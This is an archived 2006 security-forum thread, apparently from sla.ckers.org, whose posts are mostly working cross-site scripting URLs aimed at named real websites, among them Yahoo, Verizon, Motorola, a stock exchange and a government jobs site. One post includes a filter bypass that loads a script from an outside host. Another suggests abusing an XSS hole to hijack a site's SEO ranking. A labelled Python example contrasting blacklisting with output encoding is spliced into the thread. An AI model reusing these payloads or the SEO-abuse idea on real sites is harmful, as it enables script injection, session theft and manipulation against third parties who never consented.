sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Current Page: 14 of 65
Re: So it begins
Posted by: maluc
Date: September 30, 2006 06:59PM

and it seems i finished all the antivirus companies listed on this page: http://blog.washingtonpost.com/securityfix/2005/12/ranking_response_times_for_ant.html with the exception of Symantec (which ghozt found) and F-Secure..

Good job to F-Secure, as i didn't find any issues with their site after giving it a once over

-maluc

Re: So it begins
Posted by: Ghozt
Date: September 30, 2006 07:24PM

Argh. I guess it's time to start following the RFPolicy. Sorry for any inconveniences I caused with nukecops.

In other news: I still have the internets, hopefully my ISP doesn't stop my tube.



Edited 1 time(s). Last edit at 09/30/2006 07:43PM by Ghozt.

Re: So it begins
Posted by: rsnake
Date: September 30, 2006 07:29PM

Ghozt, don't stress too much, it could have been any of us. RFPolicy is always the best way to go, but I'm definitely guilty of not following it simply because it's not terribly effective in most cases unless you have a direct path of communication to the company in particular, and there's nothing stopping them from prosecuting you for the favor if the laws apply to your location.

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: rsnake
Date: September 30, 2006 07:42PM

Actually, maluc you might want to lock that down:

http://maluc.sitesled.com/metaredir.html?javascript:alert(%22XSS%22);

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: maluc
Date: September 30, 2006 07:52PM

ya, i was more than aware that it would allow XSS to my own site .. but i don't run anything there, so there's really nothing to do with scripts running on it.

Also, that host doesn't allow php/perl/cgi/etc just a free site. abuse it all you want ^^

in other news, this site http://www.enormousdating.com/go.php?name=%22%3E%3Cscript%3Ealert(%22XSS0%22)%3C/script%3E%3Cx%20&email=%22%3E%3Cscript%3Ealert(%22XSS1%22)%3C/script%3E%3Cx%20&url=%22%3E%3Cscript%3Ealert(%22XSS2%22)%3C/script%3E%3Cx%20&comments=%3C/textarea%3E%3Cscript%3Ealert(%22XSS3%22)%3C/script%3E%3Cx%20&token=&Submit=Submit seems to boost its page rank using some fake SEO pages .. i don't know much about SEO but it might be possible to use that site's XSS hole to add a link back to you and share the rank wealth? Would be interesting if so.

Found it while googling 'sla.ckers' to get to this page, http://hlstats.dkway.info/

-maluc

Re: So it begins
Posted by: Ghozt
Date: September 30, 2006 08:03PM

By the way: http://www.zone-h.org/content/view/14199/31/

Re: So it begins
Posted by: maluc
Date: September 30, 2006 08:12PM

i think rsnake posted that before.. just in a different thread somewhere

-yeah, in the News & Links section, which is probably where we should put all of them.. they'll get lost in here

-maluc

Re: So it begins
Posted by: maluc
Date: September 30, 2006 08:26PM

and to be on the safe side RSnake.. i moved it to scripts.sitesled.com/metaredir.html

usage is the same http://scripts.sitesled.com/metaredir.html?http://asdf.com

-maluc

Re: So it begins
Posted by: maluc
Date: September 30, 2006 08:37PM

http://support.honestnetworks.com/cgi-bin/helpdesk/pdesk.cgi?1=XSS0%22%3E%3Cscript%3Ealert%28%22XSS0%22%29%3C%2Fscript%3E%3Cx+&email=XSS1%22%3E%3Cscript%3Ealert%28%22XSS1%22%29%3C%2Fscript%3E%3Cx+&priority=3&category=Sales&subject=XSS2%22%3E%3Cscript%3Ealert%28%22XSS2%22%29%3C%2Fscript%3E%3Cx+&description=+&file=&lang=en&user=Unregistered&username=Unregistered&do=submit_req&Submit=Submit hosts with holes can be much worse than individual company ones, in terms of data loss.. if you can get a hosted company's web master to go to it

-maluc

Re: So it begins
Posted by: rsnake
Date: September 30, 2006 08:47PM

Maluc, that was an interesting link at hlstats... I guess I don't do enough vanity searching... I wonder why they are linking to us... Maybe they needed original content to appear less spammy. Interesting. I always wanted to be a famous porn star! ;)

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: maluc
Date: September 30, 2006 09:30PM

ya, it looks as though it was a script that googled/yahooed "hlstats" and parsed out all the links and their descriptions.. I'm a total noob at SEO so i'm not really sure if plaintext helps all the same, or non-mutual linking, but it's interesting to see. I don't really care much about SEO techniques as i don't currently have a use for it (although i likely will soon) .. but i am curious if there are ways to leech off of others' SEO efforts and let them do the work for you .. laziness at its finest.

The pron star biz.. i'll let you tackle that one alone ^^;

-maluc

Re: So it begins
Posted by: metal_hurlant
Date: September 30, 2006 11:26PM

Maluc said:
> Good job to F-Secure, as i didn't find any issues with their site after giving it a once over.

They had some XSS after all..
Reported to relevant parties for now.

Re: So it begins
Posted by: Ghozt
Date: October 01, 2006 02:27AM

Found another XSS vulnerability in Nukecops, looking for the email now.
Nevermind, it was the same vulnerability. Contacted anyway.



Edited 1 time(s). Last edit at 10/01/2006 02:45AM by Ghozt.

Re: So it begins
Posted by: thomaspollet
Date: October 01, 2006 02:51AM

http://www.fbijobs.gov/searchresult.asp?SearchString=%3Cscript%3Ealert(1)%3C/script%3E

Re: So it begins
Posted by: rsnake
Date: October 01, 2006 01:01PM

I love Yahoo but... (Try this in Internet Explorer) http://search.yahoo.com/search/age_restrict?accept=%22STYLE=%22xss:expression(alert('XSS'))%22

- RSnake
Gotta love it. http://ha.ckers.org



Edited 1 time(s). Last edit at 10/01/2006 01:02PM by rsnake.

Re: So it begins
Posted by: Kyran
Date: October 01, 2006 01:05PM

Ouch. I had to close that via Task Manager.

- Kyran

Re: So it begins
Posted by: rsnake
Date: October 01, 2006 01:26PM

Bombay stock exchange: http://www.bseindia.com/qresann/cressearch_3.asp?myScrip=%22%3E%3Cbody%20onload=alert(%22XSS%22)%3E&flag=sr

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: rsnake
Date: October 01, 2006 01:30PM

This didn't work, but wow... what a great error message... I wonder if this is an appliance or software built into the application. Cool stuff: http://www2.bmf.com.br/pages/portal/2004/clearing1/Ativos/cotacoes/include_volume_financ_liq.asp?site=%22%3Easdf

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: rsnake
Date: October 01, 2006 01:36PM

Luxembourg Stock Exchange: http://www.bourse.lu/application;JSESSIONID_BDL=FgHIN78WneaI5gPJOr6hhSUIXdItfJq5vqzNHb2CEGwE60YoObIT!-673487800!pportlc1!7203!7204!1100064480!pportlc2!7203!7204?origin=Content.jsp&event=bea.portal.framework.internal.refresh&pageid=HP_Static&code=&libelle=%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E&content=legal/Disclaimer5.jsp

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: rsnake
Date: October 01, 2006 04:00PM

It's ten cent domain day! Oh wait, no, it's XSS: https://www.networksolutions.com/custom-website-packages/domain-search.jsp?selectedDomainType=new&domainName=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E.com&loadAllNow=true&selectedProduct=DIFM_SITE_BASIC&productList=DIFM_SITE_BASIC&upsellPage=%2Fcustom-website-packages%2Fdifm-options.jsp&flowName=difm

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: Kyran
Date: October 01, 2006 04:29PM

Aw darn. Just more XSS? :P

- Kyran

Re: So it begins
Posted by: maluc
Date: October 01, 2006 04:41PM

hrm, i'd be interested in knowing where that was metal_hurlant.. even after they've fixed it

although i'm not surprised i'd overlook something at 3am or so .-.

-maluc

Re: So it begins
Posted by: maluc
Date: October 01, 2006 05:30PM

Okie, this took me quite a while to work around their hodgepodge of filters.. but finally did. there's too many to list but it's all just blacklisting which is a bad way of going about it. (as many others have already said)

unusable: http*, <scrip*>, *(*)*, <im*, <ifram*, and some others..

in any case.. although flawed, it was an interesting attempt to blacklist any input containing script code. but this works:

><script src=//ha.ckers.org/s.js?

a simple > to &gt; would have sufficed to prevent this. http://www.nukecops.com/modules.php?name=Your_Account&redirect=%3E%3Cscript%20src=//ha.ckers.org/s.js?&folder=inbox

To Nukecops admin: You seem to follow this forum as you reacted (crazily) to Ghozt's post .. so i'll spare myself the effort of emailing you.

-maluc

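The point of maluc's post above, that a pattern blacklist loses to encoding on output, as an added example that is not part of the original thread or of any site's code. The regexes are an assumed reading of the patterns listed in the post, and the unquoted hidden-field template is hypothetical; the parser only inspects the rendered markup and fetches nothing.

```python
import html
import re
from html.parser import HTMLParser

# Assumed reading of the blacklist from the post (glob-style, case-insensitive).
BLACKLIST = [r"http", r"<scrip[^>]*>", r"\([^)]*\)", r"<im", r"<ifram"]

def blacklist_allows(value: str) -> bool:
    """True when none of the blacklisted patterns occurs in the input."""
    return not any(re.search(p, value, re.IGNORECASE) for p in BLACKLIST)

def render_filtered_only(value: str) -> str:
    """Hypothetical template: blacklist check, then raw reflection into an unquoted attribute."""
    if not blacklist_allows(value):
        value = ""
    return f"<input type=hidden name=redirect value={value}>"

def render_encoded(value: str) -> str:
    """Same field with the attribute quoted and the value HTML-encoded on output."""
    return f'<input type="hidden" name="redirect" value="{html.escape(value, quote=True)}">'

class TagCollector(HTMLParser):
    """Records every start tag the parser sees in the rendered markup."""
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)

def tags_in(markup: str) -> list:
    """Start tags present in the markup, in document order."""
    parser = TagCollector()
    parser.feed(markup)
    parser.close()
    return parser.tags

PAYLOAD = "><script src=//ha.ckers.org/s.js?"  # the string quoted in the post
SAMPLES = [PAYLOAD, "<script>alert(1)</script>", "inbox"]  # constructed test inputs

if __name__ == "__main__":
    for s in SAMPLES:
        print(repr(s), "| passes blacklist:", blacklist_allows(s),
              "| filtered:", tags_in(render_filtered_only(s)),
              "| encoded:", tags_in(render_encoded(s)))
```

Encoding at the point of output does not depend on recognising any particular input, which is why it holds where the pattern list does not.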
Re: So it begins
Posted by: maluc
Date: October 01, 2006 05:35PM

http://flomfamily.org/index.html/index.php?s=xss%20holes%3Cscript%3Ea=String.fromCharCode(83);alert%28String.fromCharCode(88)%2Ba%2Ba%29%3C%2Fscript%3E&submit=Search

-maluc

Re: So it begins
Posted by: rsnake
Date: October 01, 2006 10:13PM

Guess I'm going to have to go to Vegas and fix their XSS holes: http://www.visitlasvegas.com/vegas/site/search?keyword_global_search=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: rsnake
Date: October 01, 2006 10:17PM

http://www.telco.com/int/index/en/search?words=%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: rsnake
Date: October 01, 2006 10:33PM

HellomotoXSS: http://direct.motorola.com/hellomoto/Motosupport/source/SetUpproduct.asp?productid=V180&Category=%22%3E%3CSCRIPT%3Ealert(%22XSS%22)%3C/script%3E&bluecat=

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: rsnake
Date: October 01, 2006 10:43PM

Can you hear me now? https://www22.verizon.com/pages/checkorder/online/?txtAreaCode=%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&txtPrefix=412&txtPhoneNumber=5124&txtTrackingNumber=&x=0&y=0

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: rsnake
Date: October 01, 2006 10:49PM

Anyone speak Chinese? http://www2.chinatelecom.com.cn/areacode/result3.php?code=%22%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E&imageField22.x=0&imageField22.y=0

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: rsnake
Date: October 01, 2006 11:42PM

From one of our lurkers:

> http://www.computerworld.com/action/search.do?command=basicSearch&searchTerms=%3Cscript%3Ealert%28%22Hello%20World%22%29%3C%2Fscript%3E&x=19&y=11
>
> also
>
> http://searchwinit.techtarget.com/search/1,293876,sid1,00.html?query=%3Cscript%3Ealert%28%22Hello%20World%22%29%3C%2Fscript%3E&x=29&y=10
>
> This is way.... too easy...

- RSnake
Gotta love it. http://ha.ckers.org



Edited 1 time(s). Last edit at 10/01/2006 11:43PM by rsnake.
